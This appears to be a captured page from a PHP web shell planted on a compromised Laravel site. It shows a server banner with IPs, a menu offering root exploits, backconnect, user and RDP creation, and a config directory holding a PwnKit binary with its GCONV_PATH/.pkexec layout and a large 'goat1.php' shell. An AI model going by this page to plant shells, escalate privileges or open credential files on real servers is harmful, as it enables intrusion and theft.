Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.138
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo7.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
app.php
7.74
KB
-rw-rw-r--
auth.php
4.19
KB
-rw-rw-r--
broadcasting.php
2.04
KB
-rw-rw-r--
cache.php
3.2
KB
-rw-rw-r--
cors.php
846
B
-rw-rw-r--
database.php
5.17
KB
-rw-rw-r--
dompdf.php
11.95
KB
-rw-rw-r--
filesystems.php
2.31
KB
-rw-rw-r--
frontend-fields.php
5.8
KB
-rw-rw-r--
goat1.php
143.87
KB
-rw-r--r--
hashing.php
1.54
KB
-rw-rw-r--
logging.php
3.66
KB
-rw-rw-r--
mail.php
3.68
KB
-rw-rw-r--
modules.php
8.79
KB
-rw-rw-r--
paypal.php
1.16
KB
-rw-rw-r--
purifier.php
4.32
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
2.84
KB
-rw-rw-r--
sanctum.php
2.24
KB
-rw-rw-r--
services.php
1.17
KB
-rw-rw-r--
session.php
6.86
KB
-rw-rw-r--
themes.php
1.67
KB
-rw-rw-r--
view.php
1.03
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : services.php
<?php return [ /* |-------------------------------------------------------------------------- | Third Party Services |-------------------------------------------------------------------------- | | This file is for storing the credentials for third party services such | as Mailgun, Postmark, AWS and more. This file provides the de facto | location for this type of information, allowing packages to have | a conventional file to locate the various service credentials. | */ 'mailgun' => [ 'domain' => env('MAILGUN_DOMAIN'), 'secret' => env('MAILGUN_SECRET'), 'endpoint' => env('MAILGUN_ENDPOINT', 'api.mailgun.net'), 'scheme' => 'https', ], 'postmark' => [ 'token' => env('POSTMARK_TOKEN'), ], 'ses' => [ 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION', 'us-east-1'), ], 'google' => [ 'client_id' => '', 'client_secret' => '', 'redirect' => '', ], 'facebook' => [ 'client_id' => '', 'client_secret' => '', 'redirect' => '', ], ];
Close